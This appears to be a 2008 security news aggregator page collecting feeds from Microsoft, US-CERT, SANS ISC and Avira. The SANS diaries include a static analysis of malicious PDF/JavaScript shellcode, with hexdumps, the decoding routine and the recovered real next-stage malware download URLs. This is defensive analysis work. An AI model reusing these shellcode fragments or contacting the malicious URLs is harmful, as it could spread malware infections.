Sophos virus news
Norman virus news
Kaspersky virus news
Trendmicro
Panda Software
Symantec
Microsoft Security Updates
Secunia Advisories
Secunia Virus information
Virus Alert information
US-CERT Technical Cyber Security Alerts
US-CERT Cyber Security Alerts
US-CERT Cyber Security Tips
SANS Internet Storm Center
Avira Security News
Avira Latest Threads
Sophos newsfeeds
| |||
| Panda Software | ||
|---|---|---|
| Keep up to date with the ten most recent syndicated articles from Microsoft Security at Home. |
| Last updated: Tue, 20 May 2008 22:05:18 GMT |
| Copyright: ©2006 Microsoft Corporation. All rights reserved. |
| Recent Security at Home information |
|---|
| XML Microsoft security updates for May 2008 Learn about and download the latest computer security updates for May 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs. Published:Tue, 13 May 2008 07:00:00 GMT Manage family safety settings for Zune Read how Zune Family Safety Settings allow you to restrict the media your children download or purchase. Published:Mon, 21 Apr 2008 07:00:00 GMT Help protect your Windows Live ID Learn how to protect your Windows Live ID, recognize scams, and block dangerous Web sites. Published:Fri, 11 Apr 2008 07:00:00 GMT Microsoft security updates for April 2008 Learn about and download the latest computer security updates for April 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs. Published:Tue, 08 Apr 2008 07:00:00 GMT Microsoft security updates for March 2008 Learn about and download the latest computer security updates for March 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs. Published:Tue, 11 Mar 2008 07:00:00 GMT Is it safe to install ActiveX controls on my computer? Learn about what ActiveX controls are, and when it's safe to download them to your computer. Published:Tue, 12 Feb 2008 08:00:00 GMT Microsoft security updates for February 2008 Learn about and download the latest computer security updates for January 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs. Published:Tue, 12 Feb 2008 08:00:00 GMT Does Windows Live OneCare include the technology behind Windows Defender? Windows Defender is built in to Windows Live OneCare: No need to install Windows Defender separately. Published:Thu, 24 Jan 2008 08:00:00 GMT Microsoft security updates for January 2008 Learn about and download the latest computer security updates for January 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs. Published:Tue, 08 Jan 2008 08:00:00 GMT American Academy of Pediatrics (AAP) partners with Microsoft on online safety for children Pediatricians worked with Microsoft security to establish guidelines to protect children from Internet threats, such as online predators, hackers, spyware, viruses, and identity theft. Published:Thu, 13 Dec 2007 08:00:00 GMT |
| XML |
| XML |
 |
| VirusAlert, de Nederlandstalige bron voor informatie over computervirussen. De ideale aanvulling op antivirussoftware. Dagelijks informatie over computervirussen en hoax-berichten. In het geval van een high-risk virus ontvangt u informatie via de gratis nieuwsbrief. Hieronder informatie over de laatste 10 virussen. |
| VirusAlert |
|---|
| XML W32.Rispif.A W32.Pavsee.a W32.Koobface.A Trojan.Wsnpoem W32.Xpiro W32.Xpaj W32.Stayt.A W32.Emsenush.A Trojan.Apisnuf Trojan.Spryct Trojan.Dwldr-HDN |
| US-CERT Technical Cyber Security Alerts provide timely information about current security issues, vulnerabilities, and exploits. |
| US-CERT Technical Cyber Security Alerts |
|---|
| XML TA08-225A: Microsoft Updates for Multiple Vulnerabilities TA08-193A: Sun Java Updates for Multiple Vulnerabilities TA08-190B: Multiple DNS implementations vulnerable to cache poisoning TA08-190A: Microsoft Updates for Multiple Vulnerabilities TA08-189A: Microsoft Office Snapshot Viewer ActiveX Vulnerability TA08-162B: Microsoft Updates for Multiple Vulnerabilities TA08-162C: Apple Quicktime Updates for Multiple Vulnerabilities TA08-162A: SNMPv3 Authentication Bypass Vulnerability TA08-150A: Apple Updates for Multiple Vulnerabilities TA08-137A: Debian/Ubuntu OpenSSL Random Number Generator Vulnerability |
US-CERT Alerts
| US-CERT Cyber Security Tips describe and offer advice about common security issues for non-technical computer users. Tips are restricted to a single topic, although complex issues may span multiple tips. Each tip builds upon the knowledge, both terminology and content, of those published prior to it. |
| US-CERT Cyber Security Tips |
|---|
| XML ST05-018: Understanding Voice over Internet Protocol (VoIP) ST05-017: Cybersecurity for Electronic Devices ST05-016: Understanding Internationalized Domain Names ST05-015: Understanding Bluetooth Technology ST05-014: Real-World Warnings Keep You Safe Online ST05-013: Guidelines for Publishing Information Online ST05-012: Supplementing Passwords ST05-011: Effectively Erasing Files ST05-010: Understanding Web Site Certificates ST05-009: Benefits and Risks of Free Email Services |
| SANS Internet Storm Center, InfoCON: green |
|---|
| XML Google Chrome in Beta, Vulnerabilities Discovered, (Fri, Sep 5th) Google has released their awaited browser, Chrome, in beta. So far it looks to be a Windows-only, but that's likely to change. In the short time it has been out, a few vulnerabilities have been discovered which isn't a big deal, that's what beta testing is for. You can read the about half-dozen different ones on Bugtraq, for instance. The one area of concern I do have, is that they don't have a security page of noteworthiness. The one they do have provies contact info, but nothing on current problems, where to download patches, or discussion of issues. The biggest feature that any software developer should include is support information, especially when the software being developed is a web browser. Other than that, there isn't much to say about Chrome except to wait and see (and to research) on what it does right and what it does wrong and if those privacy concerns out there are really something to worry about. -- John Bambenek bambenek /at/ gmail \dot\ com E-Mail from SANS/GIAC, (Fri, Sep 5th) There is an e-mail that went out from GIAC to complete a survey. It uses an IP instead of a name, but the IP points to SurveyMonkey, a third party that was used. This e-mail is legitimate and not a phishing attempt. -- John Bambenek bambenek/at/gmail\dot\com Wireshark 1.0.3 released, (Thu, Sep 4th) Wireshark 1.0.3 has been released and fixes several vulnerabilities that affect versions 0.9.7 to 1.0.2 inclusive. The NCP dissector was susceptible to a number of problems, including buffer overflows and an infinite loop. Versions affected: 0.9.7 to 1.0.2 Wireshark could crash while uncompressing zlib-compressed packet data. Versions affected: 0.10.14 to 1.0.2 Wireshark could crash while reading a Tektronix .rf5 file. Versions affected: 0.99.6 to 1.0.2 Wireshark's full announcement is available here and can be downloaded from here Cisco Vulnerabilities, (Thu, Sep 4th) Cisco Security Response: Cisco Secure ACS Denial Of Service Vulnerability A specially crafted Remote Authentication Dial In User Service (RADIUS) Extensible Authentication Protocol (EAP) Message Attribute packet sent to the Cisco Secure Access Control Server (ACS) can crash the CSRadius and CSAuth processes of Cisco Secure ACS. The full text is available here Cisco Security Advisory: Remote Access VPN and SIP Vulnerabilities in Cisco PIX and Cisco ASA Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive Security Appliances and Cisco PIX Security Appliances that may result in a reload of the device or disclosure of confidential information. The full details are available here New bgp hijack isn't very new., (Wed, Sep 3rd) Several news sources have been carrying a story about the DEFCON BGP hijack. While that trick was pretty cool it was not new. Original DEFCON paper is here: http://eng.5ninesdata.com/~tkapela/iphd-2.ppt Wired article here: http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html As Pieter Zatko (aka Mudge of L0pht) is quoted in this article: I went around screaming my head about this about ten or twelve years ago.... We described this to intelligence agencies and to the National Security Council, in detail. What is new here? The TTL adjustment was cool and new to me. Getting the data back to the hijacked network was also kind of cool but as prepending isnt new just not used in this way in the past as far as I know:) The rest is old very OLD. BGP4 was always capable of directing traffic that is what it was designed to do. Path-prepending is a technique that's equally well known. This is no easy to attack this as you need to be trusted by your upstream ISPs. Since those ISPs have neither the interest nor the need to trust their customers to announce only their own BGP information many ISPs filter what customers can announce to them. Large ISPs are in a position to do it as they are trusted but have even less motivation in performing BGP hijacking. A successful BGP hijack by a large ISP would result in peers publicly mocking them and front page headlines that would not be good for business. Attracting a substantial amount of traffic and sending it out again is going to get noticed. Both on your bandwidth usage with the potential for a self inflicted fill the pipe ddos and by people watching traffic patterns/announcements in BGP. Here is one of the early bgp hijacks it was an accident but in 1997 this accident caused major outages and traffic to be redirected when as7007 hijacked a large portion of the internet. http://www.merit.edu/mail.archives/nanog/1997-04/msg00444.html If you want to prevent what they did at DEFCON implementing the following template should help. http://www.cymru.com/Documents/secure-bgp-template.html Additionally ISPs should add router-filter statements (junos) policy-statement CUSTOMER.COM.AS201020 { term 10 { from { } } term 20 { } Or cisco prefix-lists ip prefix-list 201020 seq 10 permit 1.1.1.0/22 le 24 To limit what your customers can announce to you. It is described here: http://puck.nether.net/bgp/cisco-config.html A more complete PKI based solution is being developed by the sidr working group at IETF. Here is several of the drafts others are available at ietf.org. http://www.ietf.org/internet-drafts/draft-ietf-sidr-roa-validation-00.txt http://www.ietf.org/internet-drafts/draft-ietf-sidr-bogons-00.txt http://www.ietf.org/internet-drafts/draft-ietf-sidr-rescerts-provisioning-03.txt http://www.ietf.org/internet-drafts/draft-ietf-sidr-rpki-manifests-02.txt A good collection of BGP security papers is available here: http://www.cs.cmu.edu/~dwendlan/routing/ Static analysis of Shellcode - Part 2, (Wed, Sep 3rd) Starting again with a pile of Shellcode, one that the bad guys were even friendly enough to label as such in JavaScript: Using the same method as before, we take a look at what's inside: $ cat bad.js | perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' | hexdump -C | more 00000000 20 20 20 20 76 61 72 20 53 68 65 6c 6c 63 6f 64 | var Shellcod| 00000010 65 3d 75 6e 65 73 63 61 70 65 28 22 90 90 90 90 |e=unescape(....| 00000020 90 33 c0 33 c9 eb 12 5e 66 b9 00 01 8b fe 80 2e |.33.^f.....| 00000030 07 80 36 04 46 e2 f7 eb 05 e8 e9 ff ff ff f4 b5 |..6.F.| 00000040 0b 0b 0b 62 67 ac 3b 0b 0b 0b 96 4b 0f 96 7b 1f |...bg....K..{.| 000000c0 3e e6 12 c1 1b 43 fd 77 13 cc d6 10 0e e5 4b f6 |..Cw...K| 000000d0 fc 46 22 78 ea 61 96 61 27 0e e0 69 96 0f 56 96 |Fxa.a'.i..V.| 000000e0 61 1f 0e e0 96 07 96 0e c8 b6 61 64 ce f3 5c 02 |a......ad\.| 000000f0 02 02 91 51 11 ef f0 e6 ef 03 a3 01 95 11 81 e3 |...Q......| 00000100 ed 7e 39 25 32 7b 73 77 77 7b 45 32 32 7a 7a 7a |..| 00000142 Hmm. No URL to be seen. One can GUESS though that there is an URL in there, at the end of the block. URLs have a tell-tale pattern as most start with http://www, so if we see a character sequence that has abbcdeefff, with the same characters repeated, this is most often the start of an encoded URL. In our case above, sww{E22zzz meets this pattern. The most basic obfuscation used is a simple XOR operation. Finding those is easy enough, you can use a tool like XORSearch that we have covered in an earlier diary . Doesn't work here though. This ain't XOR. So what's next? Two ways. Either we run the exploit on a vulnerable system and find out what it does (so-called dynamic analysis), or we try to take things one step further with what the Unix command line has to offer, and continue with static analysis. I'm all for command line! First, we need to turn the shellcode into something that a Unix disassembler can understand. To do so, we take the above code block starting with the 90 90 90 90 sequence, and turn it into a C arrary: $ cat bad.bin | perl -ne 's/(.)/printf 0x%02x,,ord($1)/ge' bad.c leaves us with 0x90,0x90,0x90,0x90,0x90,0x33,0xc0,0x33,0xc9,0xeb,0x12,0x5e,0x66 .... which is in a nice format to turn it into int main() { char foo[] = { 0x90,0x90,0x90,0x90,0x90,0x33,0xc0,0x33,0xc9,0xeb,0x12,0x5e,0x66 .... } which compiles nicely by using $ gcc -O0 -fno-inline bad.c -o bad.bin which in turn can be disassembled by using $ objdump --disassembler-options=intel -D bad.bin The result of this operation is Intel assembly code. If you are used to reverse engineering malware in, say, OllyDbg, this will be quite readable for you. If not, then .. well, not :). A stretch down the assembly pile, we find the following code block 4005a0: 90 nop 4005a1: 90 nop 4005a2: 90 nop 4005a3: 90 nop 4005a4: 90 nop 4005a5: 33 c0 xor eax,eax 4005a7: 33 c9 xor ecx,ecx 4005a9: eb 12 jmp 4005bd C.0.1610+0x1d 4005ab: 5e pop rsi 4005ac: 66 b9 00 01 mov cx,0x100 4005b0: 8b fe mov edi,esi 4005b2: 80 2e 07 sub BYTE PTR [rsi],0x7 4005b5: 80 36 04 xor BYTE PTR [rsi],0x4 4005b8: 46 e2 f7 rexXY loop 4005b2 C.0.1610+0x12 This is the byte sequence that we imported from the shell code. And lookie, it appears as if someone is looping over the block and subtracting 7 from every byte before XORing it with 4. Let's try: cat bad.bin | perl -pe 's/(.)/chr((ord($1)-7)^4)/ge' | hexdump -C 00000000 c2 8d c2 8d c2 8d c2 8d c2 8d 28 c2 bd 28 c3 86 |.....((.| 00000010 c3 a0 0f 53 5b c2 b6 ff 80 8f bf bf bf bf bf bf |.S[..| 00000020 bf bf bf bd ff 80 8f bf bf bf bf bf bf bf bf bf |..| 000001b0 bf bf bf bf bf bf bf bf bf c2 8e 4e 0e c3 ac c3 |.N.| 000001c0 ad c3 9b c3 ac ff 80 8f bf bf bf bf bf bf bf bf |...| 000001d0 bf b8 c2 98 ff 80 8f bf bf bf bf bf bf bf bf bf |...| 000001e0 be c2 8a 0e 7e c3 98 c3 a2 73 36 1a 2f 70 68 74 |..~.s6./pht| 000001f0 74 70 3a 2f 2f 77 77 77 2e 79 6f 75 72 6d 65 64 |tp://www.yourmed| 00000200 73 65 61 72 63 68 2e 69 6e 66 6f 2f 70 73 6b 2f |search.info/psk/| 00000210 6f 75 74 2e 70 68 70 3f 62 3d 6d 66 73 61 32 30 |out.php?b=mfsa20| 00000220 30 35 2d 35 30 00 0a 0a |05-50...| And here is the URL of our next stage in all its questionable glory! Before you start sinking hours after hours into trying to find URLs in Shellcode, here's the caveat: Not all shellcode contains URLs, and it is kinda hard to find something that isn't there. But if there IS an URL in the shell code, the above should help you find it, without actually having to run the evil code. Static analysis of Shellcode, (Wed, Sep 3rd) Two months ago, ISC handler Maarten Van Horenbeeck did a great diary on how to extract exploit content from malicious PDF files. Since we are seeing a steady number of these PDFs and PDF-borne exploit attempts, here's a refresher on how to untangle them. Start with reading Maarten's diary again. Usually, when you are done with extracting the malicious sections and inflating them, you end up with a JavaScript exploit function that contains shell code of sorts. Something like To untangle these blocks, you can use a simple Perl script cat nasty.js | perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' | hexdump -C | more This converts the Unicode (%u...) to actual printable ASCII. Since most of the Unicode block is assembly (shell code), the result won't be pretty, this is why we pipe it in to hexdump. But wait, we are changing %u (hex) to ASCII and then back to a Hexdump? Yes. The reason for this is that the byte order of %uxxyy has to be swapped (yy xx) to get readable text. And hexdump -C also prints ASCII where printable. Thusly: 00000320 b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 b5 f3 ec |d.d2.dd| 00000330 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b 22 20 2b |2dd*-.. +| 00000340 0d 0a 22 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 |.....htt| 00000350 70 3a 2f 2f 61 6f 6c 63 6f 75 6e 74 65 72 2e 63 |p://aolcounter.c| 00000360 6f 6d 2f 34 65 5a 6b 37 2f 65 78 65 2e 70 68 70 |om/4eZk7/exe.php| 00000370 00 22 29 3b 0d 0a 09 76 61 72 20 59 39 49 62 36 |..| And lo and behold, we have the name of the next stage EXE that this particular exploit is trying to download. Things are not always this easy though - sometimes, the URL of the next stage is encoded. Time permitting, I'll add an example on how to crack one of those later today. OT: Happy Labo(u)r day!, (Mon, Sep 1st) The first Monday is traditionally the long weekend in North America, as we enjoy our last bit of summer now might be a good time to either reflect on all of the stuff that is going on at the office or to consider new ways to approach the badness impacting our environments 24/7 365. Cheers, Adrien MX Records Disappearing?, (Mon, Sep 1st) A reader wrote in telling use a few big domains (mostly .edu at this point) have had their MX records disappearing. Currently, I've verified the domains that were reported in fact do have problems with their MX records, but is anyone else seeing this? A case of coincidence or a wider attack? If you see any domains that had their MX records suddenly disappear, let me know. -- John Bambenek bambenek /at/ gmail \dot\ com The Number of Machines Controlled by Botnets Has Jumped 4x in Last 3 Months, (Mon, Sep 1st) I was perusing some of the data put out by the Shadowserver Foundation that tracks botnets. One piece of information grabbed my eye, namely that over the last 3 months, the number of infected machines quadrupled. During the same time period, there isn't an appreciable increase in new malware, new viruses or anything that would obviously indicated why this is so. I imagine that the bad guys have gotten better about keeping machines owned, but there is one vector that we need to get much better about tracking and managing, and that's direct web-based malware. The timing, very roughly, coincides with when we started to see increase SQL injection attacks against webservers (mind you, this is an educated guess that SQL injections are a big part of this, not a statement of fact). We are very good at tracking email-based malware (including lead-the-user-to-the-bad-website variety) and certainly network based attacks. Short of spidering the web on a consistent basis, it gets difficult to find infected sites for that malware. We at the ISC, and I'm sure many others, are working on ways to honeypot pure web-based attacks to capture this malware, but much work is left to be done. It's one of the disadvantages of operating in a reactive fashion, we are behind the power curve for some time until we figure out a way to approach something close to parity. -- John Bambenek bambenek /at/ gmail \dot\ com |
 |
| Free content directory of security related articles. All items are available for publication and can be reprinted free of charge as long as the author box remains intact. Build content for your website quickly and easily! Webmasters can take the articles included in this section and incorporate them on their website at no charge whatsoever, as long as the about the author box remains intact. |
| Avira - Latest Security News |
|---|
| Last updated: Mon, 01 Sep 2008 11:55:03 +0300 |
| XML Faked anti-virus solution develops in to a plague 29 August 2008 – A fake anti-virus solution that reporst phantasy threats is currently spreading massively and causing annoying alerts. AntiVir protects computers against the phantasy program. Complete Article - Faked anti-virus solution develops in to a plague Published:Fri, 29 Aug 2008 00:00 +0300 Avira warns online gamers: be careful with add-ons and automatic game updates 30 July 2008 – Online games are popular, but gamers are frequently the target of cyber criminals. Complete Article - Avira warns online gamers: be careful with add-ons and automatic game updates Published:Wed, 30 Jul 2008 00:00 +0300 A backdoor in an alleged Customs declaration 25 July 2008 – Avira warns of bogus mail from Customs: instead of opening the corresponding form the user opens the door for a Trojan which then infects the computer. Complete Article - A backdoor in an alleged Customs declaration Published:Fri, 25 Jul 2008 00:00 +0300 "Storm Worm" announces a monetary reform in North America 22 July 2008 – Storm Worm has a new trick focussed on American internet users. Complete Article - "Storm Worm" announces a monetary reform in North America Published:Tue, 22 Jul 2008 00:00 +0300 Harmful PDF files have no chance with Avira 21 July 2008 – Avira’s AntiVir is among the few anti-virus solutions that successfully detects harmful PDF documents. Complete Article - Harmful PDF files have no chance with Avira Published:Mon, 21 Jul 2008 00:00 +0300 |
 |
| Use Avira's Latest Threats RSS to keep track of the newest multi-language malware descriptions posted on our website automatically. For details, plese visit our website: www.avira.com. |
| Avira - Latest Threats Descriptions |
|---|
| Last updated: Fri, 05 Sep 2008 13:05:58 +0200 |
| XML BDS/Frauder.bu Danger Level: Low to Medium Threat VDF version: 7.00.06.89 Published date: Fri, 05 Sep 2008 10:42 +0200 Complete description for this threat can be found here. Published:Fri, 05 Sep 2008 10:42 +0200 DR/Autoit.I.1 Danger Level: Medium Threat VDF version: 6.39.01.161 Published date: Fri, 05 Sep 2008 09:44 +0200 Complete description for this threat can be found here. Published:Fri, 05 Sep 2008 09:44 +0200 TR/Spy.ZBot.DFR Danger Level: Medium Threat VDF version: 7.00.06.101 Published date: Tue, 02 Sep 2008 12:10 +0200 Complete description for this threat can be found here. Published:Tue, 02 Sep 2008 12:10 +0200 TR/VB.aei Danger Level: Low Threat VDF version: 6.37.01.186 Published date: Tue, 02 Sep 2008 10:31 +0200 Complete description for this threat can be found here. Published:Tue, 02 Sep 2008 10:31 +0200 EXP/Java.Gimsh.A.40 Danger Level: Low Threat VDF version: 7.00.05.183 Published date: Tue, 02 Sep 2008 10:06 +0200 Complete description for this threat can be found here. Published:Tue, 02 Sep 2008 10:06 +0200 |
